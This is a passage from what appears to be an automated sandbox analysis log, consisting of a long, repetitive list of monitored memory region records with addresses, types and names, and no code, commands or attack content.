pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6319 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6320 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6321 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6322 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6323 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6324 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6325 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6326 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6327 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6328 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6329 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6330 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6331 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6332 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6333 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6334 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6335 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6336 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6337 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6338 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6339 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6340 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6341 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6342 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6343 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6344 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6345 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6346 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6347 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6348 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6349 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6350 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6351 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6352 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6353 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6354 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 6355 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6356 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6357 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6358 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6359 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6360 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6361 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6362 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6363 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6364 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6365 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6366 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6367 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6368 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6369 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6370 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6371 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6372 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6373 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6374 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6375 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6376 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6377 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6378 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6379 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6380 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6381 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6382 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6383 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6384 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 6385 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6386 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6387 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6388 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 6389 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6390 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6391 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6392 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6393 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6394 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6395 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6396 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6397 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6398 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6399 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6400 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6401 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6402 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6403 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6404 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6405 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6406 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6407 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 6408 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6409 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6410 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6411 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6412 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6413 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6414 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6415 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6416 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6417 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6418 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6419 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6420 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6421 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6422 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6423 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6424 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6425 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6426 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6427 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6428 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6429 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6430 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6431 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6432 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6433 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6434 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6435 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6436 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6437 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6438 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6439 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6440 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6441 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6442 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6443 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6444 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6445 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6446 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6447 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6448 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6449 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6450 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6451 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6452 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6453 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6454 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6455 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6456 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6457 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6458 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6459 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6460 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6461 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6462 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6463 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6464 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6465 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6466 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6467 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6468 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6469 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6470 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6471 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6472 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6473 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6474 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6475 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6476 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6477 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6478 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6479 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6480 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 6481 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6482 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6483 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6484 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6485 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6486 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6487 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6488 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6489 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6490 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6491 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6492 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6493 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6494 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6495 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6496 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6497 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6498 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6499 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6500 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6501 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6502 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 6503 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6504 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6505 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6506 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6507 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 6508 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = 